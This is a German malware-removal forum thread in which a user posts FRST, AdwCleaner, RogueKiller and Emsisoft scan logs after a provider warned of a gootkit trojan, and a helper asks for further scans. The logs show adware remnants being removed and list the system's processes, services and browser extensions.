ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 28-11-2020
durchgeführt von seife (28-11-2020 16:06:17) Run:2
Gestartet von C:\Users\seife\Desktop
Geladene Profile: seife
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}
DeleteValue: HKEY_USERS\S-1-5-21-2235809649-4173297830-2174137979-1001\Environment|addfdabdfbbfef
DeleteValue: HKEY_USERS\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|addfdabdfbbfef
Reboot:
*****************
"AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}" => erfolgreich entfernt
"HKEY_USERS\S-1-5-21-2235809649-4173297830-2174137979-1001\Environment\\addfdabdfbbfef" => erfolgreich entfernt
"HKEY_USERS\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\addfdabdfbbfef" => erfolgreich entfernt
Das System musste neu gestartet werden.
==== Ende von Fixlog 16:06:17 ====
Code:
ATTFilter # -------------------------------
# Malwarebytes AdwCleaner 8.0.8.0
# -------------------------------
# Build: 10-08-2020
# Database: 2020-11-23.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 11-28-2020
# Duration: 00:00:02
# OS: Windows 10 Home
# Cleaned: 29
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
Deleted C:\ProgramData\Application Data\Lavasoft\Web Companion
Deleted C:\ProgramData\Host App Service
Deleted C:\Users\seife\AppData\Local\Downloaded Installations\{DAD82379-C684-4D04-83D5-2B9934A9C362}
Deleted C:\Windows\Installer\{503CA94E-0834-4CEE-AD92-BA17AF4E809A}
Deleted C:\Windows\ServiceProfiles\LocalService\AppData\Local\Host App Service
Deleted C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Host App Service
***** [ Files ] *****
Deleted C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini
Deleted C:\Windows\System32\LavasoftTcpServiceOff.ini
Deleted C:\Windows\System32\Tasks_Migrated\App Explorer
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
Deleted HKCU\Software\App Host Service
Deleted HKCU\Software\Host App Service
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted HKLM\Software\Classes\Installer\Features\E49AC3054380EEC4DA29AB71FAE408A9
Deleted HKLM\Software\Classes\Installer\Products\E49AC3054380EEC4DA29AB71FAE408A9
Deleted HKLM\Software\Classes\Installer\UpgradeCodes\04A063A0BBEACF54EAEF493C49D9E3F6
Deleted HKLM\Software\Classes\TypeLib\{ED62BC6E-64F1-46BE-866F-4C8DC0DF7057}
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\04A063A0BBEACF54EAEF493C49D9E3F6
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E61B1AB66C44604797AC56F6BC3B0FF
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37A47D4566095BF44A2CA19FBDFA04A9
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5B90A3D3F68EADC47B40D2D572B76E62
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\638EEBF8065E4B845AD5CAB77949D6CC
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\884DF2290FDFBE9408D20E763774932B
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F60B79E6444F2DE4EAC868B34B7EDADA
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FE90F95E2F75E9143B28CD4FD9C91A78
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\E49AC3054380EEC4DA29AB71FAE408A9
Deleted HKLM\Software\Wow6432Node\Lavasoft\Web Companion
Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{8BF0126F-A5B7-4720-ABB2-2414A0AF5474}
Deleted HKLM\Software\Wow6432Node\\Classes\TypeLib\{ED62BC6E-64F1-46BE-866F-4C8DC0DF7057}
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [5620 octets] - [28/11/2020 16:09:25]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
Code:
ATTFilter RogueKiller Anti-Malware V14.8.0.0 (x64) [Nov 17 2020] (Free) von Adlice Software Mail : https://adlice.com/contact/ Website : https://adlice.com/download/roguekiller/ Betriebssystem : Windows 10 (10.0.18363) 64 bits Gestartet in : Normaler Modus Benutzer : seife [Administrator] Gestartet von : C:\Users\seife\Desktop\RogueKiller64.exe Signaturen : 20201126_165710, Treiber : Geladen Modus : Standard-Scan, Löschen -- Datum : 2020/11/28 16:22:01 (Dauer : 00:07:09) ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Löschen ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ [PUP.Gen1 (Potenziell bösartig)] HKEY_USERS\.DEFAULT\Software\OCS -- -> Gelöscht [PUP.Gen1 (Potenziell bösartig)] HKEY_USERS\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\OCS -- -> Gelöscht [PUP.Gen1 (Potenziell bösartig)] HKEY_USERS\S-1-5-18\Software\OCS -- -> Gelöscht [PUP.Gen1 (Potenziell bösartig)] simplitec -- %programdata%\simplitec -> Gelöscht => ComputerID.dat -- C:\PROGRA~3\SIMPLI~1\COMPUT~1.DAT -> Gelöscht [PUM.SearchEngine (Potenziell bösartig)] browser.search.defaultenginename -- Bing® -> Gelöscht [PUM.SearchEngine (Potenziell bösartig)] browser.search.selectedEngine -- Bing® -> Gelöscht |
|
28.11.2020, 17:27
| #7 |
| /// TB-Ausbilder | Windows 10. Information von meinem Provider zu gootkit Trojaner Schritt 1 Führe Emsisoft Emergency Kit (EEK) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Schritt 2
Bitte poste mit deiner nächsten Antwort:
Geändert von M-K-D-B (28.11.2020 um 17:38 Uhr) |
|
28.11.2020, 18:04
| #8 |
| | Windows 10. Information von meinem Provider zu gootkit Trojaner Die Logdatei von EEK: Code:
ATTFilter Emsisoft Emergency Kit – Version 2020.5
Letztes Update: 28.11.2020 17:58:04
Eigene HSE\seife
HSE
Windows 10x64
Scan-Einstellungen:
Scan-Methode: Malware-Scan
Objekte: Rootkits, Speicher, Spuren, Dateien
PUPs-Erkennung: An
Archive scannen: Aus
E-Mail-Archive scannen: Aus
ADS-Scan: An
Direkter Festplattenzugriff: Aus
Scan-Beginn: 28.11.2020 17:58:36
Gescannt: 80602
Gefunden 0
Scan-Ende: 28.11.2020 18:00:06
Scan-Zeit: 0:01:30
FRST Logfile: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 28-11-2020
durchgeführt von seife (Administrator) auf HSE (LENOVO 80TV) (28-11-2020 18:00:57)
Gestartet von C:\Users\seife\Desktop
Geladene Profile: seife
Platform: Windows 10 Home Version 1909 18363.1198 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Conexant Systems, Inc. -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe
(Conexant Systems, Inc.) [Datei ist nicht signiert] C:\Program Files\CONEXANT\SAII\CxUtilSvc.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDIntelligent.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Fortemedia Inc -> ) C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
(Huawei Technologies Co., Ltd. -> ) [Datei ist nicht signiert] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHDCPSvc.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHeciSvc.exe
(Lenovo -> Lenovo Group Ltd.) C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\LenovoVantageService.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.SettingsApp.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.CompanionApp.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.Device.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(LENOVO -> Lenovo(beijing) Limited) C:\ProgramData\Lenovo\ImController\Plugins\IdeaOSDPackage\x64\utility.exe
(LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe
(LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\GDCAgentSetupRed\GDCAgent.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\seife\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.20092.10311.0_x64__8wekyb3d8bbwe\Music.UI.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe <8>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] (Fortemedia Inc -> )
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [602968 2015-12-07] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKLM\...\Run: [LenovoUtility] => C:\ProgramData\Lenovo\ImController\Plugins\IdeaOSDPackage\x64\utility.exe [911272 2017-07-27] (LENOVO -> Lenovo(beijing) Limited)
HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849920 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1831768 2016-08-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [30870200 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_113_Plugin.exe [1362432 2018-04-07] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\MountPoints2: {fd598295-7b76-11ea-8439-701ce7a3076d} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [151552 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {167A0BEA-F118-42E8-A5CC-9F5F30956F4F} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [144312 2020-09-15] (Lenovo -> Lenovo Group Ltd.)
Task: {21CA7249-953D-45FA-9C91-A0B0016999C9} - System32\Tasks\Lenovo\Vantage\Lenovo.Vantage.ServiceMaintainance => %systemroot%\system32\sc.exe start LenovoVantageService
Task: {21F9DD1D-1DE5-4822-90C2-CB7C654899D7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {320778BF-7987-4DD3-BFED-B10FF013247E} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32
Task: {3230C1BD-BA01-4E59-B5E6-6C160EE6B11C} - System32\Tasks\Nvbackend_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-14] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3397E752-9B10-4AE9-843D-1C178B28AAD8} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {3FE2E0CA-CA18-480B-AA84-51DA06B6469A} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\36fe37e6-69bf-4240-8789-54e3f941e0f1 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {4775AA5F-BC1B-4C04-B929-E339FEDF1CCF} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\76e81757-1352-4665-9649-fd3e6e13bd1d => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {9344E174-DE26-45AF-8C1C-20637B153BDC} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [25492152 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {9EEC7ADA-6DF3-48EE-B137-41E34B3C6229} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\db1c6fd4-22d9-417d-947b-00e874fdc31c => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {B465A685-368C-4D1D-A64A-34A6EEB78909} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {CECFD8CF-79F5-44F0-96C1-76B4AD73EE04} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_113_Plugin.exe [1362432 2018-04-07] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {DD4E7C7D-4A28-45FA-BF76-53E3C0448E4F} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService
Task: {E00BFAE8-C86E-4E1F-8C3C-A8E76C6723A9} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\b00c5975-d513-4b20-a54f-10c9a66bf2ef => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {FBC58171-479E-4F18-B3A6-88178F164A0C} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [62280 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{112decd3-61a3-4284-958c-e74aba2b288c}: [DhcpNameServer] 150.213.1.3
Tcpip\..\Interfaces\{d2c88b56-7aab-4dfc-b51d-99c7ec608a32}: [DhcpNameServer] 192.168.1.1
Edge:
======
DownloadDir: C:\Users\seife\Downloads
Edge Profile: C:\Users\seife\AppData\Local\Microsoft\Edge\User Data\Default [2020-11-28]
FireFox:
========
FF DefaultProfile: 9ymm54tg.default
FF ProfilePath: C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default [2020-11-28]
FF Homepage: Mozilla\Firefox\Profiles\9ymm54tg.default -> www.google.com/
FF Notifications: Mozilla\Firefox\Profiles\9ymm54tg.default -> hxxps://book.lufthansa.com; hxxps://web.whatsapp.com; hxxps://iceportal.de
FF Extension: (Shoop Cashback-Assistent: Cashback&Gutscheine) - C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\lisa@qipu.de.xpi [2020-11-26]
FF Extension: (PAYBACK Internet Assistent) - C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\toolbar-ff@payback.de-sh.xpi [2020-11-14] [UpdateUrl:hxxps://www.payback.de/resources/content/site-pia/update/1/ffsh/json]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_29_0_0_113.dll [2018-04-07] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_29_0_0_113.dll [2018-04-07] (Adobe Systems Incorporated -> )
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-06-19] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-06-19] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-11-19] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default [2020-11-28]
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxps://www.bing.com/?PC=JV01"
CHR DefaultSearchURL: Default -> hxxps://www.bing.com/search?FORM=JVSBRD&PC=JV02&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxps://www.bing.com/osjson.aspx?query={searchTerms}
CHR Extension: (Präsentationen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-04-21]
CHR Extension: (Docs) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-04-21]
CHR Extension: (Google Drive) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-06-11]
CHR Extension: (YouTube) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-06-11]
CHR Extension: (Tabellen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-04-21]
CHR Extension: (Avira Browserschutz) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2019-04-21]
CHR Extension: (Google Docs Offline) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-04-21]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-04-21]
CHR Extension: (Google Mail) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-06-11]
CHR Extension: (Chrome Media Router) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-04-21]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 CCSDK; C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe [666608 2016-03-22] (LENOVO -> Lenovo)
R2 CxUtilSvc; C:\Program Files\Conexant\SAII\CxUtilSvc.exe [132096 2016-05-12] (Conexant Systems, Inc.) [Datei ist nicht signiert]
R2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
R2 GDCAgent; C:\Program Files (x86)\Lenovo\GDCAgentSetupRed\GDCAgent.exe [1210352 2016-03-22] (LENOVO -> Lenovo)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2019-08-19] (Huawei Technologies Co., Ltd. -> ) [Datei ist nicht signiert]
R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
R2 LenovoVantageService; C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\LenovoVantageService.exe [18360 2020-07-09] (Lenovo -> Lenovo Group Ltd.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7269976 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4098056 2019-03-19] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [113992 2019-03-19] (Microsoft Corporation -> Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S4 epp; C:\EEK\bin64\epp.sys [155112 2020-10-27] (Microsoft Windows Hardware Compatibility Publisher -> Emsisoft Ltd)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [153312 2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2019-08-19] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220160 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2020-11-26] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\System32\DRIVERS\farflt.sys [197792 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [77496 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248968 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
